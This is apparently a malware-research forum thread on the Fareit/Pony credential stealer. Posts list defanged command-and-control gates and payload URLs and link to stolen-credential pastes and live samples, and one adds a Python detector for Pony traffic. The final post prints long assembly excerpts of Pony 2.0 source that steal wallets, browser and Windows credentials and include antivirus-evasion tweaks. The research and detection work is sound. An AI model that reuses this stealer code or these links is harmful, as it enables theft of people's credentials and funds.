Win32/Fareit

Forum for analysis and discussion about malware.
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Tue Jul 30, 2013 5:13 pm

Spam campaign attachment:
Download header used:

Code:

GET %s HTTP/1.0
Host: %s
Accept-Language: en-US
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: %s (Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0))
Credentials are posted to the gates with the header format below:

Code:

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: %lu
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: %s
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
Access to Facebook to the setting bars:

Code:

2http://www.facebook.com/
abe2869f-9b47-4cd9-a358-c22904dba7f7
pSettings
aPLib compressor's trace:

Code:

aPLib v1.01  -  the smaller the better :)
Copyright (c) 1998-2009 by Joergen Ibsen, All Rights Reserved.
More information: http://www.ibsensoftware.com/
Pony gates:

Code:

hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php
Zbot downloads:

Code:

hxxp://198.57.130.35:8080/forum/viewtopic.php
hxxp://bremertondisciples.org/p6AERteJ.exe
hxxp://proactionpt.com/7dPmE3P.exe
hxxp://ruffledpaper.com/N7SvZ.exe
Assembly trace:

Code:

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
  <assemblyIdentity version="5.1.0.0" processorArchitecture="x86" name="Progmn.Program_Code" type="win32"></assemblyIdentity>
  <description>Program Description</description>
  <dependency>
    <dependentAssembly>
      <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
    </dependentAssembly>
  </dependency>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
VT:
https://www.virustotal.com/en/file/9f06 ... /analysis/
Note: the slurped credential list is unchanged.
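Added example, not code from the post or from the malware: a small Python classifier that checks captured HTTP request heads against the two header templates quoted above, so proxy or IDS captures can be triaged for Pony gate posts and follow-up downloads. The fixed header order, HTTP/1.0, "Accept-Encoding: identity, *;q=0" and "Content-Encoding: binary" are the distinguishing traits; the three sample requests and their hostnames are constructed placeholders.

```python
import re

# User-Agent string recovered from the sample (quoted in the post above).
PONY_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"

# Header order of the two request templates quoted in the post. The bot fills
# fixed format strings, so the order itself is part of the fingerprint.
DOWNLOAD_ORDER = ["host", "accept-language", "accept", "accept-encoding",
                  "connection", "user-agent"]
GATE_POST_ORDER = ["host", "accept", "accept-encoding", "accept-language",
                   "content-length", "content-type", "connection",
                   "content-encoding", "user-agent"]

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/(\d\.\d)$")


def parse_request_head(raw):
    """Return (method, path, version, [(name, value), ...]) or None if malformed."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return None
    headers = []  # lowercased names, original order preserved
    for line in lines[1:]:
        if ":" not in line:
            return None  # malformed header line, do not classify
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return m.group(1), m.group(2), m.group(3), headers


def classify_pony_request(raw):
    """Return 'gate_post', 'download' or None for one raw HTTP request head."""
    parsed = parse_request_head(raw)
    if parsed is None:
        return None
    method, _path, version, headers = parsed
    names = [name for name, _ in headers]
    h = dict(headers)
    # Traits shared by both templates: HTTP/1.0, close, identity encoding, UA.
    if version != "1.0" or h.get("connection", "").lower() != "close":
        return None
    if h.get("accept-encoding") != "identity, *;q=0" or h.get("accept") != "*/*":
        return None
    if h.get("accept-language") != "en-US" or PONY_UA not in h.get("user-agent", ""):
        return None
    # Credential upload to a gate: binary body, fixed nine-header order.
    if (method == "POST" and names == GATE_POST_ORDER
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding", "").lower() == "binary"):
        return "gate_post"
    # Follow-up payload download: fixed six-header order.
    if method == "GET" and names == DOWNLOAD_ORDER:
        return "download"
    return None


# Constructed sample request heads; hostnames are placeholders, not IoCs.
SAMPLE_GATE_POST = (
    "POST /ponyb/gate.php HTTP/1.0\r\n"
    "Host: gate.example\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Accept-Language: en-US\r\n"
    "Content-Length: 1234\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Connection: close\r\n"
    "Content-Encoding: binary\r\n"
    "User-Agent: " + PONY_UA + "\r\n\r\n"
)
SAMPLE_DOWNLOAD = (
    "GET /N7SvZ.exe HTTP/1.0\r\n"
    "Host: dropper.example\r\n"
    "Accept-Language: en-US\r\n"
    "Accept: */*\r\n"
    "Accept-Encoding: identity, *;q=0\r\n"
    "Connection: close\r\n"
    "User-Agent: " + PONY_UA + "\r\n\r\n"
)
# A genuine IE8 request carries the same User-Agent but uses HTTP/1.1, gzip
# and keep-alive, so the UA string alone is not a usable signature.
SAMPLE_BENIGN = (
    "GET / HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "User-Agent: " + PONY_UA + "\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "Host: www.example.com\r\n"
    "Connection: Keep-Alive\r\n\r\n"
)


def scan_samples():
    """Classify the three constructed samples; returns {label: verdict}."""
    samples = [("gate_post", SAMPLE_GATE_POST), ("download", SAMPLE_DOWNLOAD),
               ("benign", SAMPLE_BENIGN)]
    return {label: classify_pony_request(raw) for label, raw in samples}
```

Feed it the request head of each flow from a proxy log or pcap reassembly; a "gate_post" hit on an HTTP/1.0 POST to a path like /gate.php is worth a credential-reset, not just a block.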

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Tue Jul 30, 2013 5:22 pm

*) My post took too much space, I am sorry. I'll make it shorter. Details that are the same as previously posted will not be written here. Spam campaign again:
Gates:

Code:

hxxp://webmail.alsultantravel.com:8080/forum/viewtopic.php
hxxp://alsultantravel.com:8080/forum/viewtopic.php
hxxp://webmail.alsultantravel.info:8080/forum/viewtopic.php
hxxp://198.57.130.35:8080/forum/viewtopic.php
Zbot downloads:

Code:

hxxp://www.energiereise-namaste.de/EggT.exe
hxxp://www.labycar.com/Zi6L.exe
hxxp://208.112.50.5/c38QVmd.exe
hxxp://s148231503.onlinehome.us/y3R.exe
VT:
https://www.virustotal.com/en/file/4c10 ... /analysis/

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Wed Jul 31, 2013 10:50 am

Three spam emails with Fareit attachments came in today, as usual.
The templates are shown in the snapshots below:
VT:
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/b2f7 ... /analysis/
https://www.virustotal.com/en/file/dfce ... /analysis/

The first and second post credentials to the Pony gates below:

Code:

h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltaoutriggercafe.com/ponyb/gate.php
and download these Zbots:

Code:

h00p://magic-crystal.ch/0ijiK8Y.exe
h00p://chartomresidence.com/j7qtsL.exe
h00p://ftp.petrasolutions.com/REXLa9.exe
The last one posts creds to the Pony gates below:

Code:

h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://deltadazeresort.net/ponyb/gate.php
and downloads these Zbots:

Code:

h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe
h00p://paulalfrey.com/guBwFA.exe
I took snapshots of the live Zbot download URLs with URLquery, so people can use them as evidence for clean-up purposes.
So far this is the list, use it at will: http://pastebin.com/raw.php?i=My0JHXGp
The sample can be downloaded here: http://www.mediafire.com/?clcc8xrehg90qj8

#MalwareMustDie!!

unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Re: Win32/Fareit

Post by unixfreaxjp » Fri Aug 02, 2013 10:08 am

Today's campaign... As usual, no changes.
VT: https://www.virustotal.com/en/file/71df ... 375431000/
Gates:

Code:

h00p://www.arki.com:8080/ponyb/gate.php
h00p://arki.com:8080/ponyb/gate.php
h00p://50.57.185.72:8080/ponyb/gate.php
h00p://bettersigns.net/ponyb/gate.php
and downloads Zbots from:

Code:

h00p://ftp.evolplay.org/bzfBGWP.exe
h00p://www.giftedintuitive.com/kQYjoPqY.exe
h00p://198.61.134.93/MM75.exe
h00p://ftp.jason-tooling.com/nhdx.exe
FYI, here is the slurped credential data: http://pastebin.com/raw.php?i=pxzThmHS
Sample to download: http://www.mediafire.com/?a18eybj053j38rf

#MalwareMustDie! (not a promotion, a share)

patriq
Posts: 109
Joined: Fri Jun 28, 2013 8:11 pm

Re: Win32/Fareit

Post by patriq » Sat Jun 21, 2014 3:58 pm

Found something that appears to be Pony 2.0

http://protectyournet.blogspot.com/2014 ... er-20.html

Panel and samples attached. Samples are directly from this new builder.

What are your thoughts?

wacked2
Posts: 19
Joined: Sat Dec 17, 2011 3:25 pm

Re: Win32/Fareit

Post by wacked2 » Sun Jun 22, 2014 2:47 pm

The wallet stealers just use AppDataCommonFileScan.
The TDS feature in the panel is just a normal download command.
Still uses "Host:" and "Connection: close" with HTTP/1.0
It's still mainly a Multi Password Recovery mod.

(Haven't looked into the loader)
(Only partly analyzed, couldn't find a way to remove AntiDisasmTrick with IDA)

forty-six
Posts: 66
Joined: Tue Sep 03, 2013 3:23 pm

Re: Win32/Fareit

Post by forty-six » Fri Jun 27, 2014 2:49 am

@patriq Looks like you weren't alone in that discovery:

https://blog.damballa.com/archives/2558

(from article)

Code:

http://pastebin.com/k96W1bPy

Xylitol
Global Moderator
Posts: 1652
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society

Re: Win32/Fareit

Post by Xylitol » Fri Jun 27, 2014 1:10 pm

Here are some code modifications I've spotted in the 2.0 compared with the 1.9 stub source.
I may have missed some parts, but most of the modifications are here, I think.
PasswordModules.asm:

Code:

Line 11 (removal of a useless .code, and definitions added):
ITEMHDR_ID					equ 0beef0000h

Line 109 (code addition):
MODULE_BITCOIN				equ 00000061h
MODULE_ELECTRUM				equ 00000062h
MODULE_MULTIBIT				equ 00000063h
MODULE_FTPDISK				equ	00000064h
MODULE_LITECOIN				equ	00000065h
MODULE_NAMECOIN				equ	00000066h
MODULE_TERRACOIN			equ 00000067h
MODULE_BITCOINARMORY		equ 00000068h
MODULE_PPCOIN				equ 00000069h
MODULE_PRIMECOIN			equ 0000006ah
MODULE_FEATHERCOIN			equ 0000006bh
MODULE_NOVACOIN				equ 0000006ch
MODULE_FREICOIN				equ 0000006dh
MODULE_DEVCOIN				equ 0000006eh
MODULE_FRANKOCOIN			equ 0000006fh
MODULE_PROTOSHARES			equ 00000070h
MODULE_MEGACOIN				equ 00000071h
MODULE_QUARKCOIN			equ 00000072h
MODULE_WORLDCOIN			equ 00000073h
MODULE_INFINITECOIN			equ 00000074h
MODULE_IXCOIN				equ 00000075h
MODULE_ANONCOIN				equ 00000076h
MODULE_BBQCOIN				equ 00000077h
MODULE_DIGITALCOIN			equ 00000078h
MODULE_MINCOIN				equ 00000079h
MODULE_GOLDCOIN				equ 0000007ah
MODULE_YACOIN				equ 0000007bh
MODULE_ZETACOIN				equ 0000007ch
MODULE_FASTCOIN				equ 0000007dh
MODULE_I0COIN				equ 0000007eh
MODULE_TAGCOIN				equ 0000007fh
MODULE_BYTECOIN				equ 00000080h
MODULE_FLORINCOIN			equ 00000081h
MODULE_PHOENIXCOIN			equ 00000082h
MODULE_LUCKYCOIN			equ 00000083h
MODULE_CRAFTCOIN			equ 00000084h
MODULE_JUNKCOIN				equ 00000085h


; collect proxy settings stored in browsers (HTTP/HTTPS password grabbing must be enabled in builder!)
COLLECT_PROXY_SETTINGS		equ 1

Line 198 (just a procedure rename):
invoke	IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
					
Line 235 (just to match the procedure rename):
IsFileAlreadyProcessed proc uses ebx path
Line 248 (just to match the procedure rename):
invoke	IsDataAlreadyProcessed, map.lpMem, map.dwFileSize
Line 261 (just to match the procedure rename):
IsFileAlreadyProcessed endp

Line 442:
; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Windows (WinInet) Proxy Settings (used for IE and Chrome based browsers)
; SFTP: not supported

.data
	CProxySettingsRegPath					db	'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
	CProxySettingsRegValue					db	'ProxyServer',0

.code

IFDEF COLLECT_PROXY_SETTINGS

GrabProxySettings proc stream, item_id
	LOCAL	len: DWORD
	LOCAL	mem: DWORD

	mov	len, 0
	invoke	RegReadValueStr, dwCurrentUserKey, offset CProxySettingsRegPath, offset CProxySettingsRegValue, addr len
	.IF	eax
		mov	mem, eax	
		invoke	CommonAppendDataStr, stream, mem, item_id
		invoke	MemFree, mem		
	.ENDIF

	ret
GrabProxySettings endp

ENDIF

Line 476 (code clean-up):
the .data containing this vanished:
	szHWIDValue		db	"HWID",0
	szGUIDFmt		db	"{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}",0

	win64_getnative		db	"GetNativeSystemInfo",0
	win64_kernel		db	"kernel32.dll",0
	win64_process		db	"IsWow64Process",0

IsWin64 procedure vanished from the code but is called line 518
IsAdmin procedure vanished from the code but is called line 533
InstallHWIDValue procedure vanished from the code but is called line 537

Line 591 (2 comments added):
; Tested: Far Manager v3.0 build 3367 x86
; Tested: Far Manager v3.0 build 3525 x86

Line 747 (comment added for the Windows/Total Commander proc):
; Tested: 8.01 64 bit (Release)

Line 837 (code added, Windows/Total Commander proc):
	mov byte ptr[CWTCIni], 'w'
	mov	byte ptr[CWTCRegPath1+9], 'G'
	mov	byte ptr[CWTCRegPath2+9], 'G'

Line 927 (comment added):
; Tested: WS_FTP Pro 12.4

Line 1123 (added definition for CuteFTP 9):
CCuteFTP_RegPath7	db	"Software\GlobalSCAPE\CuteFTP 9\QCToolbar",0
Line 1286 (added definition for CuteFTP 9):
invoke	CuteFTPProcessQuickConnections, stream, offset CCuteFTP_RegPath7

Line 1306 (no idea if it's a bugfix or an error in my 1.9 package):
anyway, this concerns just a letter fix for a path name in the FlashFXP dirs, not really a major change (if it is one at all).

Line 1378 (code/comment addition):
	; AV-FIXes
	mov	byte ptr[CFlashFXP_RegPath1], 'S'
	mov	byte ptr[CFlashFXP_RegPath2], 'S'
	mov	byte ptr[CFlashFXP_RegPath3], 'S'
	mov	byte ptr[CFlashFXP_HistoryName+1], 'H'
	
Line 1812 (code addition):
	mov	byte ptr[CSmartFTPHistMask], 'H'
	
Line 1868 (code addition):
	mov	byte ptr[CTurboFTPDatMask], 'a'

Line 3747 (comment addition):
; Tested: 16.0.1196.73 (Chrome based)

Line 3767 (code addition):
	COperaNewAppDataDir	db	'\Opera Software',0

Line 4219 (procedure rename, refer to line 198):
invoke	IsFileAlreadyProcessed, lpFileName

Line 4408 (code addition):
ChromeCommonScanCustomID proto :DWORD, :DWORD, :DWORD

Line 4447 (code addition):
invoke	ChromeCommonScanCustomID, stream, offset COperaNewAppDataDir, ITEMHDR_ID or 2

Line 4599 (comment edit):
; FTP Voyager 11.x-16.x
Line 4601: (comment edit):
; Tested: Version 16.1.0.0
Line 4610: (code addition):
	CFTPVoyagerProfileFile2	db	'FTPVoyager.ftp.backup',0
	CFTPVoyagerProfileFile3	db	'FTPVoyager.ftp.old.backup',0

Line 4623 (code addition):
		push	eax
		push	eax
		invoke	CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile1, ITEMHDR_ID or 0
		pop	eax
		invoke	CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile2, ITEMHDR_ID or 0
		pop	eax
		invoke	CommonFileScan, stream, eax, offset CFTPVoyagerProfileFile3, ITEMHDR_ID or 0

Line 4703 (code delete):
szSQLite3Imports vanished

Line 4726 (code delete):
szSQLiteMozillaQuery vanished

Line 4737: (code added):
	IFDEF	COLLECT_PROXY_SETTINGS
	szMozillaProxy		db	'moz-proxy://',0
	ENDIF

Line 4896 (code deletion/addition):
MozillaReadSQLColData whole procedure replaced by: ProcessMozillaSQLiteFile proto :DWORD, :DWORD, :DWORD

Line 4898 (code deletion):
Removed into the MozillaReadSQLFile proc the DWORD definitions

Line 4904 (procedure rename, refer to line 198):
invoke	IsFileAlreadyProcessed, szSQLFile

Line 4915 (comment added/code deleted)
; Process SQLite3 database using tiny db engine
LoadDllImports vanished replaced by: 	invoke	ProcessMozillaSQLiteFile, stream, szSQLFile, ITEMHDR_ID or 0

Line 4917 (additional code remove about the sqlite3 db)

Line 4967 (procedure rename, refer to line 198):
	invoke	IsFileAlreadyProcessed, szSignonsFile

Line 5071 (code addition):
	IFDEF	COLLECT_PROXY_SETTINGS
	.IF	eax
		invoke	lstrlen, offset szMozillaProxy
		invoke	StrCmpNI, host_line, offset szMozillaProxy, eax
	.ENDIF

Line 5212 (code addition):
	IFDEF COLLECT_PROXY_SETTINGS
		invoke	StrStrI, ininame, offset szMozillaPrefsJS
		.IF	eax
			invoke	PonyStrCat, dir, offset szSlash
			invoke	PonyStrCatFreeArg1, eax, ininame
			push	eax
			invoke	CommonAppendFile, stream, eax, ITEMHDR_ID or 1
			call	MemFree
		.ENDIF
	ENDIF

Line 61008 (procedure added):
PSExportAUser proc dwType, lpName, lpUser, pData, pDataLen, stream
	invoke	StreamWriteDWORD, stream, dwType

	invoke	lstrlenA, lpName
	inc	eax ; NULL

	invoke	StreamWriteBinaryString, stream, lpName, eax
	invoke	StreamWriteBinaryString, stream, pData, pDataLen

	invoke	lstrlenA, lpUser
	inc	eax ; NULL

	invoke	StreamWriteBinaryString, stream, lpUser, eax
	ret
PSExportAUser endp

Line 6418 (code addition):
szIE7CredAll	db	'*',0
Line 6420 (code addition):
szIE7Comment	db	'SspiPfc',0

Line 6498 (code addition):
	IFDEF COLLECT_PROXY_SETTINGS
		.IF	MyCredFree && MyCredEnumerate && MyCryptUnprotectData
			mov	pCred, NULL
			mov	Count, 0
			lea	eax, pCred
			push	eax
			lea	eax, Count
			push	eax
			push	0
			push	offset szIE7CredAll
			call	MyCredEnumerate
			.IF	eax && Count && pCred
				mov	esi, pCred
				.WHILE	Count && dword ptr[esi]
					push	esi
					mov	esi, dword ptr[esi]

					invoke	lstrcmpi, dword ptr[esi].CREDENTIAL._Comment, offset szIE7Comment
					.IF	!eax
						m2m	InBlob.cbData, dword ptr[esi].CREDENTIAL.CredentialBlobSize
						m2m	InBlob.pbData, dword ptr[esi].CREDENTIAL.CredentialBlob
						
						.IF	InBlob.cbData
							invoke	PSExportAUser, ITEMHDR_ID or 6, [esi].CREDENTIAL.TargetName, [esi].CREDENTIAL.UserName, InBlob.pbData, InBlob.cbData, stream
							invoke	LocalFree, OutBlob.pbData
						.ENDIF
					.ENDIF

					pop	esi
					dec	Count
					add	esi, 4
				.ENDW
				push	pCred
				call	MyCredFree
			.ENDIF
		.ENDIF
	ENDIF
	
Line 6547 (code addition):
	IFDEF COLLECT_PROXY_SETTINGS
		invoke	GrabProxySettings, stream, ITEMHDR_ID or 5
	ENDIF

Line 6929 (code addition):
ELSEIFDEF COMPILE_MODULE_OPERA
	COMPILE_CHROMIUM_CODE	equ	1
Line 6934 (code addition):
	COMPILE_SQLITE3_CODE	equ	1
ELSEIFDEF COMPILE_MOZILLA_CODE
	COMPILE_SQLITE3_CODE	equ	1
ENDIF

IFDEF COMPILE_SQLITE3_CODE

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Line 6945 (code addition):
	CChromeWebData		db	'Web Data',0
	CChromeLoginData	db	'Login Data',0
	
Line 6953 (code deletion):
deleted some datas related to chrome (szChromeLoginTable, szChromeActionURL, szChromePassValue, [...] szChromeHTTPS	

Line 6956 (code deletion):
dwChromeActionURL, dwChromePassValue, dwChromeUserValue
	
Line 7163 (line replace):
mov	eax, TRUE -> invoke	SQLiteBuildDataRecord, NULL, 0, SQLITE_DATATYPE_OTHER, lpDataOut

Line 7229 (comment edition):
; Get data length & pointer for a single cell from 1-dim record array

Line 7378 (code edition):
added 'item_id' into the SQLiteReadPage proc
Line 7488 (code edition):
Same edition as line 7378.
	
Line 7578 (code addition):
push	item_id
	
Line 7596 (code deletion):
Process SQL column definitions
	
Line 7598 (code edition):
added callback_func to SQLiteProcessSQL procedure

Line 7608 (instruction added):
cld

Line 7665 (comment edition):
; Replace double space chars to single space chars ('  ' -> ' ')

Line 7681 (comment edition):
; Process column definitions one by one

Line 7688 (code edition):
replaced invoke SQLiteProcessCol by:
			push	nCol
			push	esi
			call	callback_func
			
Line 7700 (code edition):
same edition as line 7688.

Line 7707 (code addition):
ProcessSQLiteStream proc stream, target_stream, item_id, callback_func
	LOCAL	header[16]: BYTE
	LOCAL	dwStatusCode: DWORD
	
	; Read database header
	
	invoke	StreamGotoBegin, stream
	invoke	StreamRead, stream, addr header, sizeof header
	.iF	!eax
		ret
	.ENDIF
	
	invoke	CompareMem, addr header, offset szSQLite3Header, sizeof header
	.IF	!eax
		ret
	.ENDIF

	mov	dwStatusCode, TRUE
	invoke	Stream_SafeReadWORD, stream, addr dwStatusCode
	.IF	!eax || !dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	
	; Validate page size
	push	eax
	sub	ecx, ecx
	.WHILE	eax
		shr	eax, 1
		.IF	CARRY?
			inc	ecx
		.ENDIF
	.ENDW
	pop	eax
	
	.IF	eax == 1
		mov	eax, 65536
	.ENDIF
	
	; Page size must be power of 2
	.IF	ecx != 1
		sub	eax, eax
		ret
	.ENDIF
	mov	dwSQLitePageSize, eax

	; File format write version
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	((eax != 1) && (eax != 2)) || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF

	; File format read version
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	((eax != 1) && (eax != 2)) || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	
	; Reserved bytes
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 0 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF

	; Maximum embedded payload fraction
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 64 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF

	; Minimum embedded payload fraction
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 32 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	
	; Leaf payload fraction
	invoke	Stream_SafeReadByte, stream, addr dwStatusCode
	.IF	eax != 32 || ! dwStatusCode
		sub	eax, eax
		ret
	.ENDIF
	invoke	Stream_SafeReadSkip, stream, 4*8, addr dwStatusCode
	
	; Database text encoding
	invoke	Stream_SafeReadDWORD, stream, addr dwStatusCode
	.IF	(eax < 1) || (eax > 3) || (!dwStatusCode)
		sub	eax, eax
		ret
	.ENDIF
	
	mov	dwSQLiteEncoding, eax
	
	invoke	Stream_SafeReadSkip, stream, 40, addr dwStatusCode
	
	; Start database processing from page 1
	invoke	SQLiteReadPage, stream, target_stream, 1, addr dwStatusCode, item_id, callback_func
	
	ret
ProcessSQLiteStream endp

ENDIF

; -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
; Common chromium decryption

IFDEF COMPILE_CHROMIUM_CODE

.data
	CChromeWebData		db	'Web Data',0
	CChromeLoginData	db	'Login Data',0
	szChromeLoginTable 	db	'logins',0
	szChromeActionURL	db	'origin_url',0
	szChromePassValue	db	'password_value',0
	szChromeUserValue	db	'username_value',0
	szChromeFTP			db	'ftp://',0
	IFDEF	GRAB_HTTP
	szChromeHTTP		db	'http://',0
	szChromeHTTPS		db	'https://',0
	ENDIF

.data?
	dwChromeActionURLIndex	dd	?
	dwChromePassValueIndex	dd	?
	dwChromeUserValueIndex	dd	?
.code

; Process SQL column definition 
SQLiteProcessChromeColDef proc uses edi column_definition, column_index
	invoke	Trim, column_definition
	invoke	StrStrI, column_definition, offset szSQLiteSpaceChar
	.IF	!eax
		ret
	.ENDIF
	mov	byte ptr[eax], 0
	invoke	Trim, column_definition
	
	mov	edi, offset szSQLiteStopWords
@@:
	invoke	lstrcmpi, edi, column_definition
	.IF	!eax
		ret
	.ENDIF
	@Next	@B
	
	invoke	lstrlen, column_definition
	.IF	!eax
		ret
	.ENDIF
	
	invoke	lstrcmpi, column_definition, offset szChromeActionURL
	.IF	!eax
		m2m	dwChromeActionURLIndex, column_index
	.ENDIF
	
	invoke	lstrcmpi, column_definition, offset szChromePassValue
	.IF	!eax
		m2m	dwChromePassValueIndex, column_index
	.ENDIF

	invoke	lstrcmpi, column_definition, offset szChromeUserValue
	.IF	!eax
		m2m	dwChromeUserValueIndex, column_index
	.ENDIF

	mov	eax, TRUE
	ret
SQLiteProcessChromeColDef endp
; Process chrome password data row
SQLiteProcessChromeDataTable proc uses esi edi stream, target_stream, row_array, cell_count, item_id

Line 7904 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
dwChromePassValue -> dwChromePassValueIndex
dwChromeUserValue -> dwChromeUserValueIndex

Line 7906 (line edition):
dwChromeActionURL -> dwChromeActionURLIndex
Line 7907 (line edition):
dwChromePassValue -> dwChromePassValueIndex
Line 7908 (line edition):
dwChromeUserValue -> dwChromeUserValueIndex

Line 7960 (line edition):
ITEMHDR_ID or 0 -> item_id

Line 7974 (line edition):
SQLiteProcessDataTable endp -> SQLiteProcessChromeDataTable endp

Line 7985 (line edition):
SQLiteProcessSchemaTable -> SQLiteProcessChromeSchemaTable

Line 8011 (code edition):
mov	dwChromeActionURL, -1 -> mov dwChromeActionURLIndex, -1
Line 8012 (code edition):
mov	dwChromePassValue, -1 -> mov dwChromePassValueIndex, -1
Line 8013 (code edition):
mov	dwChromeUserValue, -1 -> mov dwChromeUserValueIndex, -1

Line 8015 (line edition):
invoke	SQLiteProcessSQL, cell_data, offset SQLiteProcessChromeColDef

Line 8018 (code edition):
.IF	(dwChromeActionURLIndex != -1) && (dwChromePassValueIndex != -1) && (dwChromeUserValueIndex != -1)
Line 8019 (code edition):
invoke	SQLiteReadPage, stream, target_stream, root_page, addr dwStatusCode, item_id, offset SQLiteProcessChromeDataTable

Line 8029 (procedure rename):
SQLiteProcessChromeSchemaTable endp

Line 8031 (procedure modification):
ProcessChromeSQLiteFile proc target_stream, szSQLFileName, item_id
	LOCAL	stream: DWORD

	invoke	StreamCreate, addr stream
	invoke	StreamLoadFromFile, szSQLFileName, stream
	.IF	eax
		invoke	ProcessSQLiteStream, stream, target_stream, item_id, offset SQLiteProcessChromeSchemaTable
		.IF	!eax
			; Error occured while processing ".sqlite" file
			; Send ".sqlite" file for debugging
			;invoke	CommonAppendFileForceDupe, target_stream, lpFileName, ITEMHDR_ID or 1000h
		.ENDIF

Line 8044 (code addition):
invoke	StreamFree, stream

Line 8046 (proc code addition):
	ret
ProcessChromeSQLiteFile endp

ChromeAppDataCommonSingleFileScan proc stream, csidl, appdata_dir, config_file, item_id
	invoke	SHGetFolderPathStr, csidl
	.IF	eax
		invoke	PonyStrCatFreeArg1, eax, appdata_dir
		push	eax
		invoke	CommonFileScanCallback, stream, eax, config_file, item_id, offset ProcessChromeSQLiteFile
		call	MemFree

Line 8057 (code addition):
	ret
ChromeAppDataCommonSingleFileScan endp

Line 8060 (proc code addition):
ChromeCommonScanCustomID proc stream, base_appdata_dir, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeWebData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeWebData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_LOCAL_APPDATA, base_appdata_dir, offset CChromeLoginData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeWebData, id
	invoke	ChromeAppDataCommonSingleFileScan, stream, CSIDL_COMMON_APPDATA, base_appdata_dir, offset CChromeLoginData, id
	ret
ChromeCommonScanCustomID endp

ChromeCommonScan proc stream, base_appdata_dir
	invoke	ChromeCommonScanCustomID, stream, base_appdata_dir, ITEMHDR_ID or 0
	ret
